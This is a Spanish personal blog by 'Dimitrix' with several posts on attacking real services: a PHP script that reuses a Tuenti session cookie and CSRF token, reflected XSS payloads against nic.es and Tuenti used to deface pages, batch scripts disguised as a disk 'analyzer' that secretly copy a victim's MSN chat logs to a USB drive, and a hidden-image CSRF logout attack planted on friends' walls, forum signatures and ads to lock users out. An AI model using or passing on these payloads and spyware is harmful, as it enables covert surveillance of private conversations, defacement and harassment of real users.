Oct 21

Tuenti – Cambiar el estado automaticamente y aleatorio

Bug, Programa, Seguridad, Tuenti No Comments »

Ante todo, hola y gracias por leerme!

Bien, con esto lo que pretendo es “Que se cambie solo el estado del tuenti” cada 15 minutos por ejemplo o cuando quieras.

Para eso yo usaré el siguienten código PHP junto con el Cron (el que viene con muchos servidores) que mande la petición cada 15 minutos, aunque también podeis hacerlo con cualquier otro programa, bueno, antes de mirar el PHP os digo que neceistareis la cookie “msid” de la versión movil de tuenti, es decir http://m.tuenti.com (entrar con firefox) y la variable csfr (se puede encontrar en el código fuente de la página principal normal, si no sabeis, preguntar):

<?

$val = rand(1, 5);

if ($val == “1″) {
$sta = “Estoy genial”;
} elseif ($val == “2″) {
$sta = “no quiero mas eventos”;
} elseif ($val == “3″) {
$sta = “nooooo”;
} elseif ($val == “4″) {
$sta = “Sandraaa la mejorr”;
} elseif ($val == “5″) {
$sta = “MUAKA”;
} else {
$sta = “na de na”;
}

$string = “msid=NjUwMzM2zETgzMzczQ6MTI1NTk4DE5OQ”;

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, “http://m.tuenti.com/?m=profile&func=process_set_status&from=home&csfr=******”);
curl_setopt ($ch, CURLOPT_POSTFIELDS, “status=”.$sta);
curl_setopt($ch, CURLOPT_COOKIE, $string);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
$text = curl_exec($ch);
curl_close($ch);
die($text);
echo(“Programado por Dimitrix”);
?>

Como el código es muy simple no estaré horas explicándolo, simplemente decir que cambiamos las 6 frases que son los “estados que saldrán aleatoriamente” y cambiar el estado de la variable “msid” por la vuestra los asteriscos de la URL  por vyestra variable “csfr” y ejecutarlo y listo!

El funcionamiento
El programa lo que hace es enviar una petición con tu cookie a http://m.tuenti.com/?m=profile&func=process_set_status&from=home&csfr=****** con una frase aleatoria de las 5 que hay primero puesta (la sexta es más bien para hacer bonito en caso de que el cielo se caiga! xD)

Si lo vais a poner en otro foros por lo menos decir la web del autor o el nombre de tal (Dimitrix)
Un saludo y pronto mucho más.

May 05

XSS en “www.nic.es” (Web de dominios .es del gobierno)

Bug, Gobierno, Seguridad, Uncategorized, xss 4 Comments »

Bien, aquí les muestro un XSS en la web de NIC (Es la empresa oficial de dominios del gobierno de españa)

El XSS se encuentra en cuando se quiere hacer un WHOIS a un dominio

https://www.nic.es/esnic/esn/verValidacionWhoisAction?dominio=[XSS]

Por ejemplo:

https://www.nic.es/esnic/esn/verValidacionWhoisAction?dominio=”><br><img border=”0″ src=”http://i214.photobucket.com/albums/cc173/dimitrix-es/XSS and Others/DimitrixHack.png” width=”493″ height=”371″><big>PUTA LEY!

Diría que no es nada personal, pero quizás sea por la multa de medio millón de pesetas que me han puesto :P

Clickea en la imagen para hacerla en grande.

Tagged with:
May 02

Surfet: Programar para “Pillar” Conversaciones de Msn y Msn Plus

MSN, PLUS, Programa, Seguridad No Comments »

Me gustaría mostrar ya que está creado un programa en bat, que se trata de poner el pendrive, ejecutarlo y se copia las conversaciones de Msn y Msn plus al prendrive en modo oculto.

La aplicación está en MS-DOS (Bath…) y puse como que pareciera un programa para aumentar el rendimiento del PC, además al estar en Bath podeis modificarlo vosotros.

El problema mayor es que lo cree pensando en Msn, pero luego me di cuenta que el PC al que quería “pillar” las conversaciones tenía el Plus y se guardaba en otra carpeta de otra manera.

Además enseñaré un ejemplo de si quereis copiar automaticamente sólo un contacto en especial.

Para MSN:

@echo off
Color 30
echo.
echo                     ==================================
echo                     =        Surfet v.3.0.1          =
echo                     =        Analizador HDD          =
echo                     =             MoN                =
echo                     ==================================
echo.

set /p unidad= Nombre de unidad ejecucion:

echo.
echo Analizando HDD “%username%”
echo Puede tardar unos minutos, por favor espere, le indicaremos cuando haya finalizado.
echo.
xcopy “C:\Documents and Settings\%username%\Mis documentos\Mis archivos recibidos\*.*” “%unidad%:\FPs\” /S /C /Q

cls

echo.
echo                     ==================================
echo                     =        Surfet v.3.0.1          =
echo                     =        Analizador HDD          =
echo                     =             MoN                =
echo                     ==================================
echo.
echo.
echo Surfet termino de analizar y reparar el disco duro
echo Rendimiento conseguido:                        34%
echo.
pause

Para MSN-PLUS:

@echo off
Color 30
echo.
echo                     ==================================
echo                     =        Surfet v.3.0.1          =
echo                     =        Analizador HDD          =
echo                     =             MoN                =
echo                     ==================================
echo.

set /p unidad= Nombre de unidad ejecucion:

echo.
echo Analizando HDD “%username%”
echo Puede tardar unos minutos, por favor espere, le indicaremos cuando haya finalizado.
echo.
xcopy “C:\Documents and Settings\%username%\Mis documentos\Mis historiales de conversaci¢n\*.*” “%unidad%:\FPs\” /S /C /Q
cls

echo.
echo                     ==================================
echo                     =        Surfet v.3.0.1          =
echo                     =        Analizador HDD          =
echo                     =             MoN                =
echo                     ==================================
echo.
echo.
echo Surfet termino de analizar y reparar el disco duro
echo Rendimiento conseguido:                        34%
echo.
pause

Bien, el caso, para que todo parezca más real, la única variable que no he programa en automática es la de la únidad del pendrive donde se ejecuta.

Entonces, una vez ejecutamos la aplicación, pondremos en que unidad está y presionamos ENTER, entonces se copiarán todos los datos a la carpeta “FPs” del pen-drive (recomiendo crearla antes para que no aparezca “por arte de magia”)

También, si queremos cambiar que sólo copie las conversaciones de un contacto, por ejemplo de “peibol@hotmail.com”, modificaremos por ejemplo en el de MSN-PLUS la parte

xcopy “C:\Documents and Settings\%username%\Mis documentos\Mis historiales de conversaci¢n\*.*” “%unidad%:\FPs\” /S /C /Q

por el siguiente:

xcopy “C:\Documents and Settings\%username%\Mis documentos\Mis historiales de conversaci¢n\*peibol@hotmail.com.html” “%unidad%:\FPs\” /S /C /Q

Descargar (los dos archivos ya creados): http://www.megaupload.com/?d=293D1ZKC

Creador: Dimitrix

Tagged with:
May 01

XSS en Tuenti parcial

Bug, Seguridad, Tuenti, xss 3 Comments »

Bueno, algo que vi hace tiempo es esta especie de XSS parcial, digo parcial por que no filtra etiquetas HTML, pero tienes muchos problemas para ejecutar código, sobretodo con el símbolo “=”

El XSS se encuentrae en la variable “id” que carga videos de youtube

http://www.tuenti.com/#m=sharevideo&id=GvEh40Sd24

http://www.tuenti.com/#m=sharevideo&id=[XSS]

No obstante, primero tendremos que bloquear el script del video, para así poner nuestro nuevo códigos con menos problemas, yo hice esto

http://www.tuenti.com/#m=sharevideo&id=GvEh40Sd24“></script>

Algo muy importante es que tienes que poner el ID de un video que funcione primero y después el código, el código que muestro en el video (que se puede ver como se desplaza la frase es el siguiente):

http://www.tuenti.com/#m=sharevideo&id=GvEh40Sd24″></script><hr><h1><big><marquee><center>SALUDO A TODOS DESDE TUENTI!, DIMITRIX!</center></h1><hr>

Seguramente, después de este post, pondré uno sobre seguridad, como saltarse algunas restricciones y otras cosas “Muy divertidas”

Tagged with:
Abr 27

Tuenti bloqueado, pero no…

Bug, Seguridad, Tuenti 9 Comments »

Bien, bien, el fallo no duró ni 48h, pero era de esperar, sólo había que ver como estaba Tuenti esta tarde que tenía los anuncios bloqueados xD

Bueno, como ya dije por otros foros, tengo muchos más fallos de Tuenti escondidos, pero no quiero que los quiten todo de golpe, así que terminaremos de explicar/explotar este último que aún puede dar mucho juego.

Como ya había explicado,  al introducirnos en la url: “http://m.tuenti.com/?m=login&func=log_out” se nos cerraba la sesión sin más, antes lo escondiamos como una imagen para así cerrar los tuentis cada vez que se abrían, como ahora  se han denegado su propio dominio para no poner imagenes/url malignas de ellos (tuenti.com), esto será temporal hasta que hagan algo con la url, o eso espero, por que se han cargado gran parte de lo bueno que era poner las imagenes, por que ahora no se pueden poner imágenes de perfiles ni nada como firma, cosa que antes sí, pero bueno, mientras lo arreglen vamos a lo que vamos.

Ahora la única forma sin pensar mucho sería decir al usuario que entrase a “http://m.tuenti.com/?m=login&func=log_out”, pero noooo…. eso no lo vamos hacer!!! Que mal sería, lo que se podría seguir explotando es poniendo en las firmas de los foros y los webmasters de páginas web, este código escondido:

<img src=”http://m.tuenti.com/?m=login&func=log_out” width=”0%” height=”0%” />

Esto lo que hará, será que todos los usuarios que entren a alguna de las webs que tengan eso puesto se les cerrará la sesión, sin importar el domino, es decir, se puede entrar a www.unaweb.com y sólo por entrar se cerraría la sesión del tuenti.

PD: Los otros errores encontrados tienen que ver más con la “privacidad” y son interesantes, pero me gusta terminar uno antes de empezar el siguiente.

Tagged with:
Abr 26

Fallo en el Tuenti

Bug, Seguridad, Tuenti 9 Comments »

Este fallo consiste en una desconexión automática de la cuenta cada vez que se conecta el usario y ve su perfil o lo que quieras mediante un mensaje que le has introducido “maligno” por así decirlo, mejora aun cuando al “desconectarse” involuntariamente no puede borrar el mensaje ya que le da error por que no está logeado, así que siempre que entra se cierra.

El problema en cuestión se encuentra en que si accedes a “http://m.tuenti.com/?m=login&func=log_out” se cierra la cuenta, está creado para móviles, con el firefox se puede entrar sin problemas y con el Internet explorer te sale como para descargar así que no es que puedas navegar mucho, pero no pasa nada por que sólo queremos que se envie la solicitud y ni saldrá nada, así que veamos los pasos a seguir.

El primer paso es darse cuenta de que en Tuenti, pasa algo que no se puede poner llamar fallo por que muchas veces es muy útil, y es que al poner una imagen la reconoce automaticamente, pero lo único que hace es reconocer que hay un “http://” y un “.jpg” (u otra extensión de imagen aceptada), por eso la misma imagen la puedes poner de distintas formas:

http://www.dimitrix.es/dmx.jpg

http://www.dimitrix.es/dmx.jpg?variable=hola

http://www.dimitrix.es/dmx.jpg?

http://www.dimitrix.es/dmx?algo=.jpg

Esto puede pasar por dos cosas, una, por descuido de los programadores o por que en algunos servidores se da el caso de variable en php para por ejemplo poner imágenes aleatorias.

Entonces, sabiendo esto, lo único que necesitamos es unir las dos cosas:

http://m.tuenti.com/?m=login&func=log_out&img=dimitrix.jpg

Esta vez ponemos “&” y no “?” por que estamos uniendo más de una variable, con esta url, simplemente lo dejamos en el tablón de un amigo y cada vez que entre se le cerrará y si intenta borrar el comentario no podrá por que se habrá cerrado la sesión y le dará error.

Una vez, lo pongamos al no ser una imagen, NUNCA se cargará y se quedará parado así:

Presione en la imagen para hacerla grande

Bueno, aquí ya estariamos jodiendo a la persona que tiene ese tuenti haciendo que se deconecte cada vez y a los que visitan su perfil.

Solución:

Vas a tu tablón y le das al botón borrar y cuando te salga lo de si estás seguro, abres otra ventana del navegador y entras a www.tuenti.com y te logeas (ya que se habrá cerrado la sesión), una vez logeado NO pasas a ver el tablón ni tocas nada, regresas a donde decía borrar si querías o no y le das a “Aceptar”, entonces el comentario se borrará.

Siendo más cabrón:

También esto se puede hacer en campañas de publicad que ponen, pones eso y todos los que vean el anuncio (miles y miles de personas) se les cerrará la cuenta ya que nadie podrá escribir comentarios nuevos por que se les cerró la sesión y no pueden borrar los comentarios escritos por ti.

Autor: Dimitrix

Tagged with:
Next Entries
preload preload preload